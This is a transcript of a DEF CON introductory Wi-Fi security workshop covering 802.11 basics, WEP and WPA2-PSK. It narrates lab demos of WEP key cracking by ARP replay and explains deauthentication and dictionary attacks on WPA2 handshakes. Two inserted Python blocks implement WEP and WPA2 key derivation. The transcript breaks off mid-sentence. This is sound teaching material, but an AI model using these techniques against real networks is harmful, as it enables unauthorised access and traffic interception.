Hello guys, welcome to the first-ever virtual DEF CON event. This workshop, Introduction to Wi-Fi Security, is a part of the Wireless Village, which is a part of DEF CON as you know. So in this workshop, we are going to talk about the basics of Wi-Fi security. We will talk about the schemes that Wi-Fi uses to keep your traffic and your identity secure while you are using the Wi-Fi. And we will also look at the ways to attack those. My name is Nishant and I will be conducting this workshop along with my colleague Jeswin. We both work for Pentester Academy.

So before moving forward, a little bit of background about us. I work as R&D Manager at Pentester Academy. We work on developing labs and training content for our customers. When we are not doing that, we train around the world in different venues. We present our research. Jeswin also works at Pentester Academy. He is a researcher there. And apart from doing all the lab work and the routine work, he also helps me as a co-trainer in the trainings. And he also publishes his research. So here are some cool logos from some conferences that we have been to.

This is pentesteracademy.com. We have a lot of on-demand video courses on here. You can go and take a look. Similarly, we have a browser-based lab, which is completely in the cloud. We call it Attack Defense. Everything in this lab can be used from your browser. You don't need any VPN. You don't need any plug-in. We have customers from over 90-plus countries.

And now coming to the workshop outline. So as discussed before, we will talk about the basics of Wi-Fi. And then we will talk about sniffing and recon. We'll talk about WEP, WPA2-PSK, and WPA2-Enterprise: what they are, how the authentication works in them, and how we can actually attack them.

So first of all, when you read about Wi-Fi, you will see that it is referred to by this name or this number. That's 802.11. So 802 is the committee that deals with the network-related norms.
And .11 is assigned to Wi-Fi, or wireless LAN. So 802.11 is the standard. And then there are multiple amendments to the standard to support newer things. So for example, you have your 802.11a, b, g, n, right? Similarly, you have i, w, and there's a list. There's a list of these. So all of these are amendments to the main standard.

The Wi-Fi Alliance is the organization that actually holds the rights for this specific logo. The Wi-Fi trademarks actually belong to them. So if you are a vendor and you want to use this logo on your product, you have to take approval from them. So you submit your product to them and then they go through it, they check if it complies with whatever standards they have, and then you're allowed to use this logo.

So there are multiple amendments, but we are only going to talk about those which deal with the transmission of Wi-Fi, especially the bands and the bandwidth and all. So in that, you have a, b, g, n, and ac, which is the latest one. So 802.11a uses OFDM. All of this, because it's a basic class, we don't have that amount of time. But just to give you an overview, there's a reason why these slides are here, so that you can go back later and, if you are interested in this specific part, you can dig deeper into it. So 11a is the first one. It was the basic one. It used 5 GHz, and at that time OFDM was the way to propagate the wave, or the data in this case. And then 11b came; it used a different kind of modulation, and 2.4 GHz was used for it. Then in g they increased the data-carrying capacity. After that came n, which actually allowed you to use two or more channels together. So the idea here is to increase the throughput from a, b, g, n. What we are trying to do, we are trying to transmit more data using Wi-Fi. Because it's not like the older times now. If you talk about 10, 15 years back, you didn't have that kind of requirement, as well as that kind of equipment, at your home.
So for example, you didn't have a 4K TV. But now when you have a 4K TV which connects to your internet and you want to stream a movie or something, you need higher bandwidth. So that's where all of these standards actually came in. So 11ac is the latest one, which has been adopted by the market for the past few years now. So it can actually give you up to 1.3 Gbps of data transmission using your home Wi-Fi. And if you talk about enterprise Wi-Fi, then the limit will increase. So these standards will make sure that it can accommodate your needs with time.

So this is the 2.4 GHz channel layout. So Wi-Fi, if you talk about the main Wi-Fi, not the newer ones like 11ad or something, operates on two main channels. The first one is the 2.4 GHz channel and the second one is the 5 GHz channel. So this is the layout for the channels on 2.4 GHz. You can see that there are 14 channels, and all of these cannot be used in all geographies. There are regulations. So according to them you can use 14 channels in some of the geographies, some of the nations, and then you can use 12 or 13 in others. So you can refer to the regulatory information for this. Now what you can observe here is these bands are very narrow and they overlap. And this causes a lot of problems, because then you have interference when you have a lot of Wi-Fi networks operating and there are a lot of clients in the vicinity. It is going to cause problems. So that's where people then moved to 5 GHz. So 5 GHz is more spread out. It has non-overlapping channels. So you can transmit more. That was the idea behind it.

Now coming back to the sniffing and the connection part. Obviously, if you want to connect to a Wi-Fi, everyone is doing it now. It's part of the daily routine now.
So you have your access point in your home or at your office, and then you have a Wi-Fi card which you have connected to your desktop externally, or you can have a laptop which automatically comes with it; your phones, all of these have internal Wi-Fi cards. So they also have antennas. So using that, your device connects to the access point and then you are able to exchange traffic with it. So that's the basic thing about it.

Now, in normal mode, these cards don't actually look at the traffic of other cards. So if you are sitting somewhere and there are multiple clients and multiple routers, or access points as you like to call them, if there are multiple of these pairs, they are transmitting data back and forth. But the card that your machine is using in normal operation will only consider, or will only show you, the traffic that is for your machine. All the other traffic, it totally rejects; it totally ignores that. So if you want to take a look at other people's traffic, it can't be done in the normal mode. So for that, you have something called monitor mode. If you guys have done sniffing of other people's machines on a LAN, it's also known as promiscuous mode there. So monitor mode allows you to look at the traffic in the vicinity. So you can do sniffing and then you can go for attacks and all of those things.

So the first thing that you need is a Wi-Fi card which allows you to sniff, which actually allows you to put it into monitor mode. So here are some of the cards which actually allow monitor mode. You can order one from Amazon or some other e-commerce market. So this was the old way of doing it, it was the conventional way of doing it. Now, suppose you're dealing with something advanced, right? You're dealing with 11ac access points, which are transmitting data at a very high pace. At that point, what you can do is you can go for an off-the-shelf access point. You can write your own firmware to it and then you can use it for sniffing.
The reason for doing that is, for high-performance access points, your cards will not be able to match the throughput or the capacity of those access points. So if you have an access point, you have a better chance to not miss the traffic that is being transmitted or received by that specific access point. Now, firmware is not something that is like Windows software; it's not like you download it and you click Run and it runs and installs. It's not like that. And that's where a lot of people face problems. So when you buy an off-the-shelf router from the market and you want to transform it into a sniffer, you can use something like OpenWrt. So OpenWrt is a Linux-based project for these embedded devices, which actually allows you to customize your routers and access points. You can use it in access point mode. You can make it something else. You can make it a hacking gadget. So all of that, it actually allows you. It has support for most of the hacking and recon tools, especially for Wi-Fi and all. So you can use it if you want to go for the higher-throughput ones.

So now let's talk about some basic terminology that will help us in the later parts of the workshop. So first, Station, or STA in short, is nothing but a wireless client. It can be your mobile. It can be your laptop. It can be a desktop with a Wi-Fi card on it. Then comes BSS. BSS stands for Basic Service Set. So BSS, when you hear about it, refers to a set of an access point and the clients, if they are operating in that mode, or it can be ad hoc clients, which do not need an access point to connect. ESS is a set which contains multiple BSSs. And similarly, ESSID or SSID is the name which we use to identify that ESS. So suppose you have a Wi-Fi network, you put some name on it, "home Wi-Fi" or something. So that is the SSID. It's important to remember. That's why I'm explaining it again. SSID is the name of the Wi-Fi network that you are using.
And now, BSSID refers to the MAC address of the access point that is giving you the Wi-Fi. So BSSID will be the MAC address. And you will be able to see it when you connect with that Wi-Fi, though not in your Windows machine directly. You have to dig through, or you have to look at the packets to see it. Then comes the distribution system. So generally, distribution system refers to the network which connects the access point with the larger network.

So again, some examples of BSS. You can see that in the first picture here, you have a BSSID, this AP, you have this access point. And then there are two nodes which will be connected to this. Similarly, in the ad hoc configuration, you can see that there is no access point, but these machines are connecting with each other. ESS consists of a DS, which is connecting two access points, and then it consists of two BSSs also, two or more actually, two in this figure.

Now coming to WDS. WDS is a wireless distribution system. So suppose you want to deploy an access point in such a location where you don't have a wire, you don't have Ethernet connectivity there. So what you can do is you can use an access point which has wired connectivity to extend the network. And this bridge, or this link between these two access points, is known as a WDS link, and then you can cover more ground. So it's also known as mesh networking in Wi-Fi, if you read about it.

So now there are three main types of packets in Wi-Fi. First is the management packet. Management packets are used to connect, to disconnect, or to manage the devices, if you want to say, on board. Similarly, control packets are something which deal with the transmission control and other things, but that is not something that we are going to look into a lot. And the third one, data, as the name suggests, these are the packets which will actually carry the real data. And then you have different subtypes in these. You can read about these. This table is available on the internet.
You can see that there are multiple management packets. You have association request, association response. And similarly, you have beacons and probes and whatnot.

So to summarize the Wi-Fi environment, you have an access point, which is currently operating a Wi-Fi network, which will be identified by its SSID. That's the Wi-Fi network name. And then the BSSID will be there, because the MAC address needs to be there on the access point. And this SSID will then go out in the beacons. So beacons are the packets which your access point uses to advertise that, hey, I'm providing you this specific Wi-Fi that you can use. If a client has already connected to this Wi-Fi before, instead of waiting for a beacon frame, it can also do probing. So by probing, it sends a probe message looking for that specific network, which it already connected to once or multiple times in the past. So once your client discovers the Wi-Fi network, then it goes ahead, it exchanges some packets with the access point, and then it connects with the access point. And after that, you can transmit data, or you can access the internet and other things.

So now, because it is not a wired thing, it's wireless, your packets are open. Anyone with a monitor mode interface can capture them, and then they can look into what you are doing if it is not encrypted. So that's the reason why we needed Wi-Fi encryption standards, so that we can protect our data from being sniffed by other people. At your home, it might not matter, but especially if you are at a coffee shop, if you are at your office, if you are at an airport, all of this matters.

So here are some of the standards that we are going to talk about. We are going to talk about WEP, that was the older standard. I hope that no one is using it now, but still you will find it somewhere in a CTF, or in someone's home who is not very tech savvy or is old. WPA and WPA2 are the ones that are currently used. These can be used in two different configurations.
WPA2-PSK, or pre-shared key. It's also known as WPA or WPA2 Personal, because it is meant for personal use. And then there is the Enterprise one, which is meant for enterprise use. WPA3 is the latest standard. It is something that you will see in the mainstream within a year, or maybe this year. In some places you might have already started seeing this.

So now to do the recon and the cracking for WEP and WPA-PSK, we are going to use the aircrack-ng suite of tools. So it's a set of tools which allows you to do different things. So airodump-ng and airmon-ng will allow you to capture the traffic, to monitor the airwaves, to see the devices and access points that are in the vicinity. airbase-ng and aireplay-ng allow you to create a honeypot, to send the deauthentication messages, to replay the messages. And similarly, if you want to crack the key or the passphrase for WEP or WPA-PSK, you use aircrack-ng. So you can know more about these by searching for them on Google. This tool is used a lot, so you'll find multiple videos on it. So now we'll talk about how to do basic recon with airmon-ng and airodump-ng.

So now it's demo time, and for that we will shift to our demo setup. So this is the portal that we are going to use to learn about these attacks. The URL is blurred as of now; don't worry about it. We'll post the link to it in the YouTube description. So if you go down, you'll see that we have a course here which says Wi-Fi Basics Workshop. You press start on it. It will show you four different scenarios. First is the Wi-Fi basics, and then you have attacking WEP, Enterprise and PSK. So we are going to start the Wi-Fi basics one. So we chose this interface because, as you can see, you have commands on this side, you have the lab on this side. So it will help you to learn, because you are beginners, so it really helps if you have guidelines ready.
Instead of searching for it on a blog and then coming back and then pasting and making a mistake and going back, that actually wastes a lot of time. So what we will do now, we will select a server from here. In your case, you might only see one option. Solve this reCAPTCHA and then you start the lab. It will take some time in starting the lab, so please be patient.

So the lab is ready now. What we have to do is, on the left-hand panel, we will read about the steps. So first is: check the Wi-Fi interfaces present on this system, and then to fire this, we will use this button. Please use Firefox for this exercise. It might face some issues on Chrome and others. So if you click this, the command will execute and you will see that we have a wlan0 interface which is in managed mode. So as we discussed before, managed mode is good for normal operation, but if you want to do the recon and the sniffing and other things, this won't be enough. So you have to put it in monitor mode, and that's what we are doing in step 2. So this is the command to put it in the monitor mode. As you can observe: iw dev wlan0, the name of the interface, and then set monitor none. So I'll press this and it seems that the command has run. Now let's again run this command to see if it is in monitor mode. Yes, it is. So we are ready now.

So now what we will do, we will run airodump-ng on wlan0 and we will not define any other options for now. We will let it hop over all the channels of 2.4 GHz and find what it can. So press this and, as you can observe here, now it is looking for different ESSIDs or SSIDs. You can also see the corresponding BSSIDs, corresponding channels, and you can also see some of the stations, which means these are laptops or these can be phones. In this case, this is an emulated lab, so obviously these are none. But in a realistic scenario, you will see the phones, the laptops, other machines, sending probe requests, looking for these specific Wi-Fi networks. Right?
So this is how you can check which devices are in the vicinity. So do a Ctrl-C to stop it and then let's move to the next screen here. Now suppose I am only interested in looking at the traffic of channel 1. So in that case, I can fire this command, and here with the argument -c I have defined the channel number. So what you will see here is that this time the channel will not hop, and you will only see the traffic which is coming on this specific channel. So this is how you use airodump-ng to do basic recon, and with this, our lab is done. You can stop the lab after this and we'll get back to the slides. So now I will pass it over to my colleague, Jeswin, who will go through the WEP part, and then I'll meet you guys again when we discuss WPA2-PSK and WPA2-Enterprise.

Hello everyone. Next we'll take a look at Wired Equivalent Privacy. When it comes to a wired network, the physical proximity itself acts as a security mechanism. That is, we need to get into the building physically, find a port, plug in our device and sniff the traffic or perform an attack. Whereas in the case of wireless networks, we have radio waves which are not bound by walls. Therefore, it is very easy to intercept the traffic. WEP was the original IEEE standard to add security to wireless networks. It provided security equivalent to that of a wired network, and hence the name. WEP used the RC4 stream cipher for generating the key stream. It supported a 40-bit shared key, which is equivalent to 5 ASCII characters or 10 hexadecimal characters, and a 104-bit shared key, which is equivalent to 13 ASCII characters or 26 hex characters. Now if the same key is used to encrypt multiple plaintext messages, what the attacker can do is analyze the ciphertexts for patterns, and the attacker can automatically find the key. To prevent this, an initialization vector is added to the key. In the case of WEP, the initialization vector had a length of 24 bits. Therefore, the encryption key had a length of 64 bits or 128 bits.
WEP used CRC32 for generating the integrity check value. Now let's take a look at the encryption process. So here we have the initialization vector, the key and the message. The initialization vector and key are passed to the key scheduling algorithm and the pseudo-random number generator. It generates the key stream which will be used to encrypt the data. For the second part, we have the message. The integrity check value is generated from the message and is concatenated with the message, and then it is encrypted. The integrity check value is regenerated after decryption, so we can verify that the message has not been tampered with. So finally, the message and the ICV are XORed with the key stream to generate the ciphertext. In the end, the packet has the initialization vector, a 2-bit key ID, the ciphertext and the ICV.

Now let's take a look at the decryption process. In the decryption process, we have the initialization vector, the 2-bit key ID, the ciphertext and the ICV. We'll get the key from the key ID and we'll feed it to the key scheduling algorithm along with the initialization vector. This is then passed to the pseudo-random number generator and the key stream is generated, which will be used to decrypt the ciphertext. The ciphertext is XORed with the key stream to generate the message and the ICV. Now the ICVs are compared and, if both of them match, the packet is accepted, otherwise it is discarded.

Now the next question arises: what was the weakness in that? The major weakness in that was the length of the initialization vector. 24 bits was not enough, and as a result, when we have a large number of packets, the IV will get repeated, and once the attacker has all of these ciphertexts with repeated IVs, the attacker can easily find out the shared key.
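An added example, not from the workshop or from Pentester Academy's lab material, that implements the WEP encryption and decryption just described (RC4 keystream from IV||key, CRC32 ICV, IV and key-ID header) and shows the keystream-reuse weakness: two frames encrypted under a repeated IV XOR to the XOR of their plaintexts, no key needed. The key, IV and messages are constructed sample values, and the function names are my own.

```python
import struct
import zlib


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4: key-scheduling algorithm (KSA) followed by the PRGA."""
    s = list(range(256))
    j = 0
    for i in range(256):                       # KSA: permute S using the key bytes
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):                    # PRGA: emit one keystream byte per step
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def rc4_crypt(key: bytes, data: bytes) -> bytes:
    """Encrypt or decrypt (same operation): data XOR keystream."""
    return bytes(a ^ b for a, b in zip(data, rc4_keystream(key, len(data))))


def wep_icv(message: bytes) -> bytes:
    """ICV = CRC-32 over the plaintext, little-endian as it appears on the wire."""
    return struct.pack("<I", zlib.crc32(message) & 0xFFFFFFFF)


def wep_encrypt(shared_key: bytes, iv: bytes, key_id: int, message: bytes) -> bytes:
    """Build the WEP body: IV(3) | KeyID byte | RC4(IV||key, message||ICV)."""
    assert len(iv) == 3 and len(shared_key) in (5, 13) and 0 <= key_id <= 3
    per_packet_key = iv + shared_key          # 24-bit IV prepended to the 40/104-bit key
    body = rc4_crypt(per_packet_key, message + wep_icv(message))
    return iv + bytes([key_id << 6]) + body   # the 2-bit key ID lives in the top bits


def wep_decrypt(keys: dict, frame: bytes):
    """Return (message, icv_ok). `keys` maps key ID (0..3) to the shared key."""
    iv, key_id = frame[:3], frame[3] >> 6
    plain = rc4_crypt(iv + keys[key_id], frame[4:])
    message, icv = plain[:-4], plain[-4:]
    return message, icv == wep_icv(message)   # recomputed ICV must match the decrypted one


def keystream_reuse_leak(frame_a: bytes, frame_b: bytes) -> bytes:
    """Two frames under the same IV and key share a keystream, so XORing the
    ciphertexts cancels it and leaves plaintext_a XOR plaintext_b (ICV bytes dropped)."""
    assert frame_a[:4] == frame_b[:4], "demonstration needs a repeated IV"
    n = min(len(frame_a), len(frame_b)) - 8   # strip 4-byte header and 4-byte ICV
    return bytes(a ^ b for a, b in zip(frame_a[4:4 + n], frame_b[4:4 + n]))


# Constructed sample values: a 40-bit key, one IV, two equal-length messages.
KEY = b"k3y!!"
IV = b"\x01\x02\x03"
MSG_A = b"GET /index.html"
MSG_B = b"GET /login.html"

if __name__ == "__main__":
    frame_a = wep_encrypt(KEY, IV, 0, MSG_A)
    frame_b = wep_encrypt(KEY, IV, 0, MSG_B)   # same IV: the weakness the talk describes
    print("decrypted:", wep_decrypt({0: KEY}, frame_a))
    print("leak without key:", keystream_reuse_leak(frame_a, frame_b).hex())
```

The leak equals MSG_A XOR MSG_B, which is why a repeated IV lets anyone who knows one plaintext read the other; with 2^24 IVs the repeats are inevitable on a busy network.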
Now the attacker has two options. One is to wait and sniff all the packets till we get enough IVs, or the attacker can inject a packet to force the access point to send more packets, and therefore the attacker will get more IVs, and this way the second option will be faster to crack any WEP key. Now to crack a 64-bit WEP key usually 250,000 IVs are required, and to crack a 128-bit WEP key 1.5 million IVs are required, but with techniques such as PTW it is possible to crack WEP keys with a very small number of IVs. So to crack WEP keys there are many methods: fake authentication, caffe-latte attack, fragmentation attack and PTW attack.

Now to crack the WEP key we will start by sniffing the packets and identifying the SSID, BSSID and the channel. Now in order to send packets to the access point, the MAC address of the attacker has to be authenticated with the access point, otherwise any packet we send will get lost and we will get a deauthentication. Now in order to authenticate the MAC address, fake authentication can be used. So what happens in fake authentication is we tell the access point that we can prove that we have the shared key, but we will not send the shared key yet. This way the access point will add the MAC address of the attacker to the list of clients who can send packets to the access point. Now since we have not sent the shared key to the access point, we cannot transmit data. However, we can capture the data from a legitimate client connected to the network and then replay those packets. Now this is exactly what we are going to do. First we will capture the ARP request sent by an already connected client and then we will replay it to the access point. So when the access point gets the ARP request it will rebroadcast the ARP request with a new initialization vector. This way we can continuously send ARP requests to the access point to get more and more ARP requests with new initialization vectors. Once we have enough initialization vectors we can use
aircrack-ng to crack the WEP key.

So now let's take a look at the demo. So we will quickly select the server and we will solve the captcha and then we will start the lab. It should take a couple of seconds for the lab to come up. The lab is now ready. Let's increase the size of the font. We will start by listing the interfaces on the machine. So we have two interfaces, wlan0 and wlan1. Both are in managed mode. So we will set wlan0 into monitor mode and we will check the list of interfaces again. So now we can see wlan0 is in monitor mode. Now let's check the networks which are present in the vicinity. We can do this with the help of the airodump-ng command. So now as we can see we have the Epic Media network which is using WEP on channel 6. So next what we will do is we will capture the packets and write those packets into a capture file. Now it will just keep sniffing. It could take a lot of time to get enough packets. So what we are going to do is we will start a replay attack in order to generate more packets. So we will start, and now we need around 10,000 data packets. The current count is 183, 1,132, and the number is increasing. So now we have 10,000 data packets. We will stop the capture and we will also stop attacking the access point. Now we will use the aircrack-ng command to crack the key. We will have to mention which network we want to target. In this case we have the Epic Media network which has the index of 4. So enter 4 now and then we will start cracking. So we were able to find the key. The key was 14332.

So guys, welcome back. I hope you enjoyed the WEP session. So now we will talk about WPA2-PSK. This is the scheme that is widely used. You will find this at your home and even in the smaller coffee shops or the restaurants or even the small offices. So WPA2 came after WPA. WPA was a transitional scheme to move from WEP to WPA2. So WPA2 uses dynamic keys, unlike WEP. It uses the AES encryption standard with CCMP mode, and the protocol is still secure. It is prone to brute forcing or
the dictionary attacks if your password is not strong. But apart from that, the scheme is still secure. There were the KRACK attacks discovered last year which were for this specific scheme. But again, it is very important to understand that the problem was not in the scheme itself; it was in the implementation. So the scheme, theoretically, if you choose a good password, is good to go.

But WPA2 also had its own shortcomings. It doesn't have forward secrecy, which means if I am capturing all of your traffic today and you are using WPA2-PSK, even if I don't have the password today, if I somehow manage to get the password two months after or two years after, I can still go back and decrypt all of your traffic. So that is not good from a security point of view. Similarly, there is no management frame protection. So your receiver, when it receives a management frame, doesn't have any way to tell if it is coming from a real source or it is something which is sent by an attacker or a malicious user. And that is the reason why the deauthentication attacks, which are used widely for DoS, denial of service, work. So you can read about the deauthentication attacks; it's very common now, it's been used for quite some years now. And also WPA2-PSK, or Personal, is supposed to be personal. It is supposed to be used in a personal network. So if you use it in a work environment, or some place which you don't count as a personal space, it is also prone to insiders. So if you have a malicious insider, he can actually see the traffic of all the people on that specific Wi-Fi.

So as we mentioned before, there are no static keys like WEP. So the idea is you generate a dynamic key, you use that to decrypt the traffic or encrypt the traffic, and then next time when you do this you generate the keys again. In saying it's very easy, but you need some way in which both the parties can have the keys and then they can use them to encrypt and decrypt stuff, and obviously this key needs to be the same
because we are going to use symmetric encryption, it's a lot of data. So what we do in this case is we use something called PSK; that's where the PSK term comes from, it's pre-shared key. So you have a passphrase which is between 8 to 63 letters long, or characters long, and you use it, you feed it to PBKDF2. PBKDF2 is a function; it stands for password-based key derivation function, and it will actually give you a pre-shared key of 256 bits. The reason for doing this is passphrases are easier for human beings. Just like you have IP-to-domain mappings, similarly you can use a passphrase to generate the pre-shared key; it's easier to remember something meaningful than a chunk of random hex characters. So when your access point is configured it already knows the passphrase; when you connect to that network you also know the passphrase, and that's how it works. So both the parties can calculate the same PSK and then they can use it for the connection.

But again, as you can observe, PSK is not transient or temporary in nature. It's not dynamically generated; you are converting it from the passphrase to the PSK, but that's not dynamic in nature. It will remain the same till the time you change the password. So that's where we have to generate what we refer to as the PTK from this. So PMK is derived using this specific function here: you use PBKDF2, you pass it the secret passphrase, you pass it the SSID name and then the SSID name length, and then these numbers are there: 4096 is the number of iterations that will happen, and then 256 is the intended key length of the PMK key that we are going to get. So you can read more about PBKDF2 and all of this in RFC 2898.

So what will happen in WPA2, or even in WPA, is we have this handshake; we call it the 4-way handshake, and this handshake is used to generate this specific, you know, temporary key that you use to pass the traffic on securely, obviously. So when your client wants to connect to the access point, first of all it will locate the access point, it will
locate the Wi-Fi network, and after that there are authentication and association messages which are part of the Wi-Fi protocol, but here please don't confuse authentication with the thing that we are going to do now. So it's more of a compatibility kind of thing rather than security. The steps are pretty much the same: your client will ask the AP that, hey, I want to connect, and your AP will say, OK, go ahead. So this much is done. After this, both of them have the pre-shared key. Why? Because both of them had the passphrase, and when you have the passphrase you can derive a PSK of 256 bits from it; we just saw it in the previous slides.

Now your access point will send message 1. There are 4 messages, that is why it is the 4-way handshake. So in the first message it will generate a random number or a random string, it will call it ANonce, and it will send it in a packet in plain text to the supplicant. Supplicant here is the client: your mobile, laptop, you know, whatever it is. Now what your client will do, it will take this ANonce and also generate a random number or random string called SNonce. So A here denotes the authenticator, or the access point; S here denotes the supplicant, or the station. So when you have ANonce and SNonce, which are randomly generated, you can use this specific function here to generate the PTK. PTK is the pairwise transient key, and as you can observe here we passed PMK to it. PMK is nothing but a key that we derived using the passphrase and SSID and SSID name length, and then you have ANonce and SNonce; these are randomly generated by the access point and the client, and then you have the access point MAC and the client MAC. So this is the information which is now used to generate the temporary key. This is temporary because ANonce and SNonce are randomly generated. So now this happens, so this guy can generate a PTK. Now what it will do, it will send SNonce plus MIC. MIC, or Michael, is used to verify the integrity of a message, and it is signed by a key, so in this case the key that we have used to generate it is used to sign
this message, and again ANonce and SNonce are in plain text. So it will be sent to the access point. Now the access point has all the information, so it will also generate the PTK. So what it will do, it will generate its PTK, it will check this MIC, and then it will generate the MIC for this specific packet and match the MIC to the MIC. Now if this MIC matches, that means the PTK is the same with both parties. In that case the access point will go ahead, install the key for use, and it will also send a message to the client that, you know, this key is good, please go ahead with it, and then the client will also say OK, I have installed the key and now we can use this key for encrypting the traffic, and then the encryption starts. Now if the access point does not have the same PMK, if the passphrase is different for the access point and the client, then the PTK will be different, because, you know, it depends on the PMK, right? Then the MIC check will fail, and in that case the access point will reject it and it will not connect.

So this is how the authentication works in the WPA 4-way handshake. You get it: you had the passphrase, you used PBKDF2, you put it in, you gave it the SSID name and length, and you generated a pre-shared key that is 256 bits in length, and then from the 4-way handshake you get all of this information. You get SNonce, ANonce, because again these are transmitted in plain text, there is no encryption, and then the AP MAC and client MAC are something that you can easily see from there. You will generate the PTK; you will use the PTK to encrypt the traffic. So now from an attacker's angle, if you want to perform an attack, a dictionary attack to guess the PTK, how will you do it?
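An added example, not part of the talk or its lab material, that carries the 4-way handshake key derivation just described through in code: PMK = PBKDF2(passphrase, SSID, 4096 iterations, 256 bits), PTK = PRF-512 over the two MACs and the two nonces, and the EAPOL-Key MIC check the access point performs on message 2, which is what fails when the two sides hold different passphrases. The MACs, nonces, SSID and passphrases are constructed values and the function names are my own; the EAPOL-Key frame layout follows the 802.11i field offsets but carries no key data.

```python
import hashlib
import hmac
import os
import struct

# Offset of the 16-byte MIC inside an EAPOL-Key frame: 802.1X header (4) + descriptor
# type (1) + key info (2) + key length (2) + replay counter (8) + nonce (32) + IV (16)
# + RSC (8) + ID (8).
MIC_OFFSET = 81
NONCE_OFFSET = 17  # nonce field starts right after the 8-byte replay counter


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK (the PSK) = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: concatenate HMAC-SHA1(key, label | 0x00 | data | i), i = 0..3."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from PMK, authenticator MAC (aa), supplicant MAC (spa) and both nonces.
    min/max ordering lets both sides build the same input regardless of their role."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def build_eapol_key_msg2(snonce: bytes, replay_counter: int = 1) -> bytes:
    """Constructed EAPOL-Key (RSN descriptor) frame for message 2 with a zeroed MIC.
    key_info 0x010a = descriptor version 2 (HMAC-SHA1 MIC), pairwise key, MIC present."""
    body = (
        struct.pack(">BHHQ", 2, 0x010A, 16, replay_counter)  # type, key info, key len, replay
        + snonce                                              # key nonce = SNonce, in the clear
        + bytes(16) + bytes(8) + bytes(8)                     # key IV, key RSC, key ID (unused)
        + bytes(16)                                           # MIC placeholder, filled by sign
        + struct.pack(">H", 0)                                # key data length (none here)
    )
    return struct.pack(">BBH", 2, 3, len(body)) + body        # 802.1X version 2, type 3 = Key


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """WPA2 key MIC: HMAC-SHA1 over the frame with its MIC field zeroed, first 16 bytes."""
    zeroed = frame[:MIC_OFFSET] + bytes(16) + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def sign_eapol(kck: bytes, frame: bytes) -> bytes:
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]


def verify_eapol(kck: bytes, frame: bytes) -> bool:
    return hmac.compare_digest(eapol_mic(kck, frame), frame[MIC_OFFSET:MIC_OFFSET + 16])


def four_way_handshake(ap_passphrase, sta_passphrase, ssid, aa, spa, anonce=None, snonce=None):
    """Simulate messages 1 and 2 plus the AP-side MIC check; True if the AP installs the key."""
    anonce = anonce or os.urandom(32)   # message 1: AP sends ANonce in plain text
    snonce = snonce or os.urandom(32)
    # Supplicant: PMK from its own passphrase, PTK from PMK + MACs + nonces, KCK = PTK[0:16].
    sta_ptk = derive_ptk(derive_pmk(sta_passphrase, ssid), aa, spa, anonce, snonce)
    msg2 = sign_eapol(sta_ptk[:16], build_eapol_key_msg2(snonce))
    # Authenticator: reads SNonce from the frame, recomputes PTK from its own PMK, checks MIC.
    rx_snonce = msg2[NONCE_OFFSET:NONCE_OFFSET + 32]
    ap_ptk = derive_ptk(derive_pmk(ap_passphrase, ssid), aa, spa, anonce, rx_snonce)
    return verify_eapol(ap_ptk[:16], msg2)   # MIC mismatch means different PMK: reject


# Constructed values for the demonstration.
AA = bytes.fromhex("001122aabbcc")   # authenticator (AP) MAC
SPA = bytes.fromhex("66778899ddee")  # supplicant (client) MAC
SSID = "WorkshopNet"

if __name__ == "__main__":
    print("same passphrase:", four_way_handshake("correct horse battery", "correct horse battery", SSID, AA, SPA))
    print("wrong passphrase:", four_way_handshake("correct horse battery", "Tr0ub4dor&3", SSID, AA, SPA))
```

Everything the AP uses to verify the MIC except the PMK travels in the clear, so the strength of the passphrase fed into PBKDF2 is the only thing standing between a captured message 2 and an offline guess; defenders should treat a long random passphrase (or WPA3's SAE) as the fix.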
you will take a dictionary you will take one passphrase from dictionary at a one time and you will generate the PTK because obviously you also need to have this information that comes from 4-way handshake once you have this you can generate the PTK you have a packet from the real access point on client which has MIC you will generate the MAC you will generate the MIC and then you will compare the MIC if MIC is correct then you have done it you have got the right passphrase for it so this is how the dictionary attack will work now look at the information what we need so all packets will have AP and client MAC because one is sender one is receiver A nonce is going in packet 1 and packet 3 and S nonce is going in packet 2 so now what you can do here is you can either take all 4 packets or you can either take packet 1 or 2 and you will have all the information that you need to crack WPA to PSK and again the authentication we already talked about it it's a packet that you send you spoof it you send it to client from posing as access point if you are sending it to access point you will pose as one of the clients and then you will tell the other party that I don't want to be connected to you anymore so in that case the other party will think that this message is being sent by the real party and it will disconnect so this comes handy when you have access point connected with the client and you want this to move so that you can capture the 4 way handshake because remember 4 way handshake will only take place when you are connecting to the device first time when you are connecting to the access point only then your client will do the 4 way handshake if it's already connected to the 4 way handshake so if we want to capture 4 way handshake for a device which is already connected we have to do a authentication so now it's the demo time we will do this using the same lab the principles are very simple WPA PSK is using a week pass phrase which is present in our dictionary we will 
